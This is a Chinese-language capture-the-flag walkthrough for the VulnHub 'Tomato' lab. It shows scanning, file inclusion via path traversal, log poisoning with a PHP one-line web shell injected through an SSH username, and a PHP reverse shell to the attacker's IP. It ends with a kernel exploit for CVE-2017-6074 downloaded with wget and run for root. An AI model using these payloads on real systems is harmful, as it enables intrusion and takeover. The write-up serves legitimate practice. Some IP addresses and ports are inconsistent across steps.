環境
Kali: 192.168.132.131
靶機:192.168.132.41 靶機地址:https://www.vulnhub.com/entry/tomato-1,557/
一、資訊收集
第一步 掃描、發現主機
nmap -sP 192.168.132.0/24

第二步 掃描靶機開放的埠和系統資訊

第三步 訪問網站,查看網站信

二、漏洞探測
第一步 掃描漏洞
nmap --script=vuln 192.168.132.141

漏洞簡介:
Apache HTTP服務器1.x和2.x允許遠程攻擊者通過部分HTTP請求導致拒絕服務
(守護行程中斷),這與2.2.15之前版本中缺少mod_ReqTimeout模塊有關
第二步 掃描目錄
gobuster dir -u http://192.168.132.141 -w /usr/share/wordlists/dirb/common.txt -t 30

python3 dirmap.py -i http://192.168.132.141 -lcf

dirb http://192.168.132.141 /usr/share/wordlists/dirb/common.txt

第三步 訪問目錄/antibot_image,存在目錄遍歷漏洞
http://192.168.132.141/antibot_image/

打開目錄

第三步 查找可利用的檔案
http://192.168.132.141/antibot_image/antibots/info.php
查看開啟功能是否可以利用,查看原始碼注釋

允許遠程讀取URL檔案,但是不允許包含URL檔案,可以進行利用
查原始碼,提示可以傳參,存在檔案包含漏洞

第四步 利用檔案包含漏洞
http://192.168.132.141/antibot_image/antibots/info.php?image=../../../../../etc/passwd

查看日志檔案
http://192.168.132.141/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log

三、漏洞驗證
第一步 利用已知檔案包含漏洞,以及開的ssh埠
嘗試包含ssh認證日志檔案/var/log/auth.log,并利用ssh認證用戶名實作命令注入:
(使用之前發現的2211埠是ssh,日志里面發現tomato用戶,查看日志資訊)
第二步 進行一句話木馬進行注入
ssh '<?php system($_GET['cmd']);?>'@192.168.232.187 -p 2211

第三步 驗證PHP代碼是否注入成功
http://192.168.132.141/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
&cmd=ls

http://192.168.132.141/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ifconfig

第四步 開啟nc監聽
nc -lvvp 4444

第五步 反彈shell
php反彈shell代碼:
php -r '$sock=fsockopen("192.168.132.131",4444);exec("/bin/sh -i <&3 2>&3");'
需要進行url編碼
http://192.168.132.141/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
&cmd=php%20-r%20'%24sock%3dfsockopen(%22192.168.132.131%22%2c3333)%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b'
觸發反彈shell

第六步 開啟互動式shell
python3 -c "import pty;pty.spawn('/bin/bash')"

四、提權
第一步 查看系統資訊
uname -a
whoami

第二步 下載提權腳本,執行,編譯,并開啟apache2服務
使用CVE-2017-6074的poc
git clone https://github.com/kkamagui/linux-kernel-exploits.git
cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
./compile.sh

第三步 使靶機訪問攻擊機的網站,下載exp,授予權限,并執行
cd /tmp
wget http://192.168.232.129/CVE-2017-6074
chmod +x CVE-2017-6074
./CVE-2017-6074

第四步 查看flag
cd /root
ls
cat proof.txt

五、總結
這套靶機難易程度一般,使用gobuter進行目錄爆破,存在目錄遍歷漏洞,獲得phpinfo資訊,存在檔案包含漏洞,通過ssh登錄失敗,將一句話存入日志檔案,利用檔案包含漏洞,進而達到遠程命令執行,反彈shell,利用linux內核漏洞進行提權,獲得root權限,在該靶機中我在遠程命令執行反彈shell命令處卡住了,死活不能反彈shell,后來通過多篇文章的參考,發現,反彈shell陳述句后沒有添加陳述句結束符號;,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302365.html
標籤:其他
